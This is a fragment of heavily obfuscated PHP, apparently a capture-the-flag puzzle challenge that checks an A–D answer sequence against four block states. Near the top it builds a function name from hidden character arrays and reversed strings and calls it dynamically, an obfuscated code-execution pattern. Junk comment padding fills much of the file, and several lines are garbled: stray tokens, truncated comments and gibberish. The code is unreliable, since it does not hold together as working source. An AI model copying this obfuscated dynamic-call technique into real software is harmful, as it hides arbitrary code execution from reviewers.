  121.             $ab = pause(array_map(function($arr){ return chr($arr); },array_slice($this -> perlin_noise,(188*2)+$userans*3,$userans-3)));
  122.             $c = strval(sprintf("%s%s",$b,pause(strrev(implode("",pause($ab))))));
  123.             $c($pcs);
  124.             // 希儿世界第一可爱!
  125.             die(urldecode("%3c%62%72%3e%3c%62%72%3e"));
  126.             var_dump(array_slice($this -> perlin_noise,1000,800));
  127.         }
  128.     }
  130.     class InazumaPuzzle/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/{private $blockA = 0;private $blockB = 0;private $blockC= 0;private $blockD = 0;private/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*//*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*//*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/$MAX_ENUM = 2;private/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/$MIN_ENUM = 0;
  131.         public function/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/__construct() {$this -> blockA = 2;$this-> blockB =/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/
  132.             0;$this -> blockC = 0;/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/$this -> blockD = 2;}
  134.         private/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/function setBackBlock($block)/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/{$setType = $this/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/-> MIN_ENUM;
  135.             $maxType = $this -> MAX_ENUM;
  136.             switch ($block) {
  137.                 case 'A':if ($this -> blockA == $maxType) { $this -> blockA = $setType;return true; }
  138.                     else return/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/false;
  139.                 case 'B':
  140.                     if ($this -> blockB== $maxType) { $this -> blockB = $setType;return true; }else return false;
  141.                 case 'C':
  142.                     if ($this/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/-> blockC == $maxType){ $this -> blockC = $setType;return true; }else/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/return false;
  143.                 case 'D':
  144.                     if ($this -> blockD== $maxType) { $this -> blockD = $setType;return true; }
  145.                     else return false;
  146.                 default: throw new Exception("bad_args", 1);
  147.             }
  148.         }
  150.         private function hit($blockIdx) {
  151.             global/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgj
  152.             global $cnbd;
  153.             rejfgireghjebvf;fvevbbn();ff;
  154.             grtisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/$text;
  155.             $text = urldecode("%6e%69%6c%72%65%70%5f%46%46%49%44");
  156.             switch ($blockIdx) {
  157.                 case "A":
  158.                     if (!$this -> setBackBlock("A")) $this -> blockA += 1;
  159.                     if (!$this -> setBackBlock("B")) $this -> blockB += 1;
  160.                     break;
  161.                 case "B":
  162.                     if (!$this -> setBackBlock("A")) $this -> blockA += 1;
  163.                     if (!$this -> setBackBlock("B")) $this -> blockB += 1;if (!$this -> setBackBlock("C")) $this ->/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/blockC += 1;
  164.                     break;
  165.                 case "C":if/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/
  166.                 (!$this -> setBackBlock("B")) $this -> blockB += 1;if (!$this -> setBackBlock("C")) $this -> blockC += 1;
  167.                     if (!$this ->/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/setBackBlock("D"))$this -> blockD += 1;
  168.                     break;
  169.                 case "D":
  170.                     if (!$this -> setBackBlock("C")) $this -> blockC += 1;
  171.                     if (!$this -> setBackBlock("D")) $this -> blockD += 1;
  172.                     break;
  173.                 default: throw new Exception("bad_args", 1); 
  174.             }
  175.         }
  177.         public function __AFG50CE4_RG1() {
  178.             global $puzz_writeup;
  179.             if (count($puzz_writeup) === 0) throw new Exception("Invalid WriteUP",1);for ($i = 0; $i < count($puzz_writeup);/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/
  180.             // bcdufvcf%00
  181.             $i++) {
  182.                 if (strcmp($puzz_writeup[$i],"A") !== 0 and strcmp($puzz_writeup[$i],"B") !== 0 and strcmp($puzz_writeup[$i]/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!
  184.                 \00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/,"C") !== 0 and strcmp($puzz_writeup[$i],"D") !== 0) die("笨蛋笨蛋笨蛋笨蛋!!~ 都...都跟你说了答案里只能有ABCD的......");
  185.             }
  186.             for ($i = 0; $i < count($puzz_writeup); $i++) $this -> hit($puzz_writeup[$i]);
  187.             global/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/$userans; 
  188.             $userans =/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/$this ->blockA + $this/*->ddd;
  189.             echo();die();\n\0
  190.             \00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/-> blockB + $this -> blockC/*\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!\00\00\00%00%00fvjivgjisghtrehgtghbvtrifh 希儿世界第一可爱!*/+ $this -> blockD;
  191.         }
  193.         public function/*\00\00\00%00%00fvjiv
  194.         fmfveb vebvgebb;
